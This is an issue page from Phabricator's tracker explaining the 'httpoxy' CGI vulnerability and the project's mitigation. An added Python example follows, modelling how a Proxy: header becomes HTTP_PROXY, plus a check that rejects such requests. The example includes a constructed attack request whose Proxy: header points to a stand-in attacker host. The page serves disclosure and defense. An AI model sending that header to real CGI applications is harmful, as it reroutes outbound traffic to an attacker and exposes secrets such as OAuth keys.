
"httpoxy" HTTP Proxy Environmental Vulnerability
Closed, Resolved (Public)

Description

A vulnerability dubbed "httpoxy" was recently widely disclosed. You can find technical details about the disclosure in the general case here: https://httpoxy.org

This issue discusses the vulnerability and Phabricator's response to it.


If you're coming here because you hit an error message on your install, it means one of two things:

  • You made a request with the "Proxy:" header. The only known use of this header is exploiting the "httpoxy" vulnerability. To resolve this issue, do not send requests with this header.
  • The environment variable HTTP_PROXY is defined. This is likely a mistake: cURL does not read this variable. To resolve this issue, unset this variable.
    • To configure HTTP proxying, use PhutilHTTPEngineExtension (T10227, recommended) or the http_proxy variable (lowercase, case-sensitive, read by cURL).

The remainder of this issue discusses the vulnerability in greater detail.


The "httpoxy" vulnerability takes advantage of the CGI convention that every request header is copied into an environment variable named HTTP_ followed by the uppercased header name (with "-" replaced by "_"), which means the client can write to any variable with that prefix. For example, if you send an Xyz: header in an HTTP request, the value of the header will be written to the HTTP_XYZ environment variable.

Normally, environment variables beginning with HTTP_ are not interesting, but sending a Proxy: header (which has no meaning in HTTP) lets you write to HTTP_PROXY, which some HTTP client libraries read to configure outbound proxying. This could allow an attacker to route outbound HTTP requests originating in Phabricator through a proxy server they control, potentially reading sensitive information (for example, OAuth application secret keys).

Phabricator is generally not vulnerable because it uses cURL directly, and cURL only reads http_proxy (lowercase, case-sensitive), which this attack can not produce, except on Windows NT (apparently, since environment variable names are case-insensitive there), where Phabricator does not run. However, it's possible that we're vulnerable on systems using a very old cURL (the fix appears to be fairly recent, from 2013), or when running with third-party extensions that cause us to execute other libraries which have vulnerabilities, or that will run such libraries in the future, or the stars and planets might align or whatever else.

Additionally, almost all requests Phabricator makes are either uninteresting (no secret data or credentials) or originate from the daemons (which can not be attacked this way, since they do not run under CGI), but at least some requests are potentially slightly interesting and web-originated (OAuth handshakes, Subversion HTTP requests to remote repositories).

After D16318, we will reject suspicious requests that appear to contain a Proxy: header out of an abundance of caution. We can't actually distinguish between a Proxy: header sent by the client and an HTTP_PROXY environment variable set on purpose, so this may raise false positives, but the variable is likely a mistake (cURL does not read it). You probably intend to set http_proxy instead.
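The following is an added example, not Phabricator's own code (which is PHP; D16318 is not reproduced here). It models in Python both the mechanism described above (the CGI translation of request headers into HTTP_* variables, and a naive client that honours HTTP_PROXY versus a cURL-style client that only honours lowercase http_proxy) and the mitigation the task describes (refusing requests when HTTP_PROXY is present). The request text, host names and the `cgi_environ`/`reject_httpoxy` function names are constructed for this illustration and are not from the task or from Phabricator.

```python
"""Added example (not Phabricator code): how a Proxy: request header becomes
HTTP_PROXY under CGI, how a naive proxy resolver picks it up, and a Python
port of the reject-suspicious-requests check the task describes."""
import re
from typing import Dict, Optional
from urllib.parse import urlsplit

# Constructed sample requests for the example (not captured traffic).
ATTACK_REQUEST = "\r\n".join([
    "GET /oauth/callback HTTP/1.1",
    "Host: phabricator.example",
    "Proxy: http://attacker.example:8080",   # the httpoxy payload
    "User-Agent: curl/7.47.0",
])
BENIGN_REQUEST = "\r\n".join([
    "GET /oauth/callback HTTP/1.1",
    "Host: phabricator.example",
    "User-Agent: curl/7.47.0",
])


def cgi_environ(raw_request: str) -> Dict[str, str]:
    """Translate an HTTP request head into CGI meta-variables the way
    RFC 3875 section 4.1.18 prescribes: each header becomes HTTP_<NAME>,
    with the name uppercased and every non-alphanumeric character
    replaced by '_'. Simplified: a real server also sets SERVER_*,
    SCRIPT_NAME and maps Content-Type/Length to CONTENT_*."""
    request_line, *header_lines = raw_request.strip("\r\n").split("\r\n")
    method, target, version = request_line.split(" ", 2)
    env = {
        "REQUEST_METHOD": method,
        "REQUEST_URI": target,
        "SERVER_PROTOCOL": version,
        "GATEWAY_INTERFACE": "CGI/1.1",
    }
    for line in header_lines:
        name, _, value = line.partition(":")
        key = "HTTP_" + re.sub(r"[^A-Z0-9]", "_", name.strip().upper())
        env[key] = value.strip()
    return env


def naive_proxy_for(env: Dict[str, str], url: str) -> Optional[str]:
    """The vulnerable pattern: a client library that honours HTTP_PROXY
    (in any case) for outbound http:// requests. Under CGI the variable is
    attacker-controlled, so outbound traffic is routed to the attacker."""
    if urlsplit(url).scheme != "http":
        return None
    for key in ("HTTP_PROXY", "http_proxy"):
        if env.get(key):
            return env[key]
    return None


def curl_style_proxy_for(env: Dict[str, str], url: str) -> Optional[str]:
    """cURL's behaviour for http:// targets as described in the task: only
    the lowercase, case-sensitive http_proxy is honoured. The CGI
    translation can only produce uppercase names, so it cannot set it."""
    if urlsplit(url).scheme != "http":
        return None
    return env.get("http_proxy") or None


def reject_httpoxy(env: Dict[str, str]) -> Optional[str]:
    """Mitigation in the spirit of D16318, ported to Python (assumption:
    the original rejects on the presence of HTTP_PROXY). A Proxy: header
    and a deliberately exported HTTP_PROXY look identical here, so the
    message covers both causes; returns None when the request is fine."""
    if "HTTP_PROXY" in env:
        return (
            "Refusing request: HTTP_PROXY is set in the environment. Either "
            "the request carried a 'Proxy:' header (httpoxy) or HTTP_PROXY "
            "was configured by mistake; cURL reads http_proxy (lowercase)."
        )
    return None


if __name__ == "__main__":
    env = cgi_environ(ATTACK_REQUEST)
    print("HTTP_PROXY =", env.get("HTTP_PROXY"))
    print("naive client would use:", naive_proxy_for(env, "http://oauth.example/token"))
    print("curl-style client would use:", curl_style_proxy_for(env, "http://oauth.example/token"))
    print("check:", reject_httpoxy(env))
```

Running the script with the constructed attack request shows HTTP_PROXY populated from the Proxy: header, the naive client selecting the attacker's proxy for an OAuth token request, the cURL-style client ignoring it, and the check refusing the request; the benign request passes the check. Note that the check deliberately does not try to tell a header apart from a real environment variable, which is exactly the false-positive trade-off described above.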